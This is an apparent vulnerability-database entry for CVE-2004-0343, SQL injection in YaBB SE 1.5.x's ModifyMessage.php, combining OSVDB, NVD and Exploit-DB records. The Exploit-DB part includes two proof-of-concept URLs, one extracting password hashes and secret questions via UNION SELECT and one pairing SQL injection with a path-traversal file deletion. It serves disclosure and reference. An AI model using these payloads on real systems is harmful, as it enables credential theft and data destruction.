YaBB SE ModifyMessage.php Multiple Parameter SQL Injection
2004-03-01T00:00:00
ID OSVDB:6734 Type osvdb Reporter OSVDB Modified 2004-03-01T00:00:00
Description
No description provided by the source
References:
Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107816202813083&w=2
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0002.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0159.html
ISS X-Force ID: 15354
CVE-2004-0343
Bugtraq ID: 9774
{"cve": [{"lastseen": "2017-07-11T11:14:24", "references": ["http://www.securityfocus.com/bid/9774", "http://marc.info/?l=bugtraq&m=107816202813083&w=2", "https://exchange.xforce.ibmcloud.com/vulnerabilities/15354"], "description": "Multiple SQL injection vulnerabilities in YaBB SE 1.5.4 through 1.5.5b allow remote attackers to execute arbitrary SQL via (1) the msg parameter in ModifyMessage.php or (2) the postid parameter in ModifyMessage.php.", "edition": 3, "reporter": "NVD", "published": "2004-11-23T00:00:00", "title": "CVE-2004-0343", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:24", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2004-0343"], "scanner": [], "modified": "2017-07-10T21:30:05", "cpe": ["cpe:/a:yabb:yabb:1.5.5b::second_edition", "cpe:/a:yabb:yabb:1.5.5::second_edition", "cpe:/a:yabb:yabb:1.5.4::second_edition"], "id": "CVE-2004-0343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0343", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T21:47:11", "osvdbidlist": ["6734"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "YaBB SE 1.5.x Multiple Parameter SQL Injection. CVE-2004-0343. Webapps exploit for php platform", "reporter": "Alnitak and BackSpace", "published": "2004-03-01T00:00:00", "type": "exploitdb", "title": "YaBB SE 1.5.x - Multiple Parameter SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0343"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2004-03-01T00:00:00", "id": "EDB-ID:23775", "href": "https://www.exploit-db.com/exploits/23775/", "sourceData": "source: http://www.securityfocus.com/bid/9774/info\r\n \r\nIt has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database.\r\n \r\nYaBB SE versions 1.5.4, 1.5.5, and 1.5.5b are reported to be affected by these issues, however it is possible that other versions are vulnerable as well.\r\n\r\nhttp://www.example.com/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2\r\n7,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*\r\n\r\nhttp://www.example.com/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d\r\neleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul\r\nl,null,null,null,null,null,null,null,null/* HTTP/1.0", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23775/"}]}
